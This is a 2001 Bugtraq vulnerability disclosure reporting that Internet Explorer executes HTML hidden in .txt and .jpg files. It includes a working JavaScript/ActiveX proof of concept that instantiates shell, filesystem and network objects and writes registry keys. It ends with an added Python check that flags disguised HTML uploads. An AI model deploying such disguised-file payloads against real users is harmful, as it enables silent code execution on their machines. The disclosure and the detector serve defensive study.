Bugtraq mailing list archives

TXT or HTML? -- IE NEW BUG


From: cr4zybird <cr4zybird () hotmail com>
Date: 27 Jul 2001 22:07:15 -0000

TXT or HTML? -- IE NEW BUG
Vulnerable programs:
IE4, IE5, IE5, IE6, Microsoft Word, Microsoft Excel, Microsoft PowerPoint, Tencent Explorer (I've tested all the versions of IE that I can find; they are all vulnerable)

Description:
IE doesn't recognize the extensions of files, which may contain some HTML code.
Write an HTML file in Notepad, save it as *.txt, and upload it to any server. Then use IE to visit this page. Found: IE executed the HTML code contained in the *.txt file. We can also change the extension to *.jpg or other non-downloaded file types. Finally, I found that IE can't recognize the extension of a file.
Using this bug, anyone who knows how to make web pages can successfully attack other people. Users generally think that only .html/.htm can be used to attack, but now even .txt, .jpg and .png can do everything that an HTML page can do! Even e-mail attachments, because Outlook Express is vulnerable, too. Treat it seriously, please.
Due to the company's not wanting to be responsible for this bug, please take it seriously, and be aware.
Here is some source code, just to prove the existence of this new bug.

<SCRIPT Language="JavaScript" type="text/javascript">
<!--

document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");

function f(){
  try
  {
    //ActiveX initialization
    a1=document.applets[0];
    a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    Shl = a1.GetObject();
    a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
    a1.createInstance();
    FSO = a1.GetObject();
    a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    Net = a1.GetObject();

    try
    {
      if (document.cookie.indexOf("Chg") == -1)
      {
        Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "it's a good day to die!");
        Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "it's a good day to die!");
        var expdate = new Date((new Date()).getTime() + (1));
        document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
      }
    }
    catch(e)
    {}
  }
  catch(e)
  {}
}
function init()
{
  setTimeout("f()", 1000);
}
init();

// -->
</SCRIPT>

<img src=http://www.gnu.org/graphics/gnu-head-sm.jpg>


It's a .jpg which may change your IE title (you have to change the extension to *.jpg first).

Non-vulnerable programs:
Netscape

Solutions:
1) Download some antivirus software and keep the virus database updated all the time. Also change the names of some 'dangerous' programs in your system, such as format.exe, deltree.exe, etc., i.e. change format.exe to format_0.com, etc.
2) Try not to visit those so-called 'hacker' or 'cracking' sites. Most of the time, you are the victim while you want to learn to attack others.
3) If you have to visit some site that you are not quite sure is safe, then check it here first: http://crazybird.51.net/look.htm
   Or you can also save the source code of this page to your computer, then save it as *.htm, so you can execute it on your own computer. Be aware if it says "the web page contains some unsafe ActiveX" or something like that; then you'd better not execute that ActiveX widget. And I can't promise that it can give you this kind of warning for any aggressive files.
4) DO NOT open your attachment in IE!!!!! Don't ever open any type of file in IE directly!!! BE AWARE!! You'd better use antivirus to scan it before you open it after you've downloaded it to your computer.
5) Update the system patch immediately if the patch comes out.

If you still have questions, mail to:
cr4zybird () hotmail com
Thanks to: springcream, skywind, nETMONKEY, xiajian, Nancy. They've given me a lot of help on testing and communicating with Microsoft.

by:
crazybird
cr4zybird () hotmail com
IRC: irc.sunnet.org 6667
#CNFORCE
26/7/01 China
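
A defender-side check for the behaviour described in the post, as an added example that is not part of the original message: it flags uploads whose name promises passive content (.txt, .jpg, .png) but whose leading bytes carry HTML or lack the expected image signature. The function name, marker list, inspection window and sample files are assumptions constructed for illustration.

```python
import re
from pathlib import PurePosixPath

# Extensions users treat as passive content (the ones the advisory names).
PASSIVE_EXTS = {".txt", ".jpg", ".jpeg", ".png"}

# Leading bytes a genuine image of each type starts with.
MAGIC = {
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
}

# Tags that suggest the body is really HTML (list chosen for this example).
HTML_MARKERS = re.compile(
    rb"<(?:!doctype\s+html|html|head|body|script|applet|object|iframe|img)\b",
    re.IGNORECASE,
)

SNIFF_WINDOW = 1024  # assumption: number of leading bytes to inspect


def audit_upload(filename: str, data: bytes) -> list:
    """Return findings for a file whose name promises passive content."""
    ext = PurePosixPath(filename.lower()).suffix
    if ext not in PASSIVE_EXTS:
        return []  # files served as HTML anyway are out of scope here
    findings = []
    head = data[:SNIFF_WINDOW]
    magic = MAGIC.get(ext)
    if magic is not None and not head.startswith(magic):
        findings.append("magic-mismatch")
    match = HTML_MARKERS.search(head)
    if match:
        findings.append("html-marker:" + match.group(0).decode("ascii").lower())
    return findings


# Constructed samples (not taken from any real upload).
SAMPLES = {
    "notes.txt": b"Meeting moved to 3pm.\nBring the <draft> copy.\n",
    "photo.jpg": b'<SCRIPT Language="JavaScript">/* ... */</SCRIPT>',
    "logo.png": b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR",
    "page.html": b"<html><body>ok</body></html>",
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, audit_upload(name, body) or "clean")
```
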


